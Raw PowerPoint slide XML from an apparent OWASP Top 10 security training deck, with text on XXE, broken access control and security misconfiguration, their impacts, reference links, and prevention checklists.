                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5580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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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rgbClr val="FEFFFF"/>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lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Penetration testers can exploit XXE. DAST tools require additional manual steps to exploit this issue. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SAST tools can discover this issue by inspecting dependencies and configuration.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of all affected applications and data.</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pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1,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("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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rPr>
              <a:t>page, this is a flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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Bypassing access control checks by modifying the URL, internal application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Allowing the primary key to be changed to another's users record, such as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Metadata manipulation, such as replaying or tampering with a JWT access control token or a cookie or hidden field manipulated to elevate privileges.</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Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or API not enforcing access controls for POST, PUT and DELETE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Controls: Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Standard: V4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Guide: Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Sheet: Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>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9"/>
              </a:rPr>
              <a:t>CWE-22: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>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10"/>
              </a:rPr>
              <a:t>CWE-284: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>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11"/>
              </a:rPr>
              <a:t>CWE-285: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>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12"/>
              </a:rPr>
              <a:t>CWE-639: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Portswigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>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Implement access control mechanisms once and re-use them throughout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Domain access controls are unique to each application, but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web server directory listing, and ensure file metadata such (e.g. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) is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Rate limiting API and controller access to minimize the harm from automated attack tooling</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Developers and QA staff should include functional access control unit and integration tests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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solidFill>
            <a:srgbClr val="83276B"/>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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073224334"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</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100" b="0" kern="1200" baseline="0" dirty="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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</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0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation of access control is a core skill of penetration testers. SAST and DAST tools can detect the absence of access control, but not verify if it is functional. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.</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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans"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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access control detection is not typically amenable to automated static or dynamic testing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pP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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The technical impact is anonymous attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record.</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r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to get your code. Attacker then finds a serious access control flaw in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Is your application missing the proper security hardening across any part of the application stack? Including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are any unnecessary features enabled or installed (e.g. ports, services, pages, accounts, privileges)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are default accounts and their passwords still enabled and unchanged?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Will error handling reveal stack traces or other overly informative error messages to users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On upgraded systems, are the latest security features disabled or not configured securely?</a:t>
            </a:r>
          </a:p>
          <a:p>
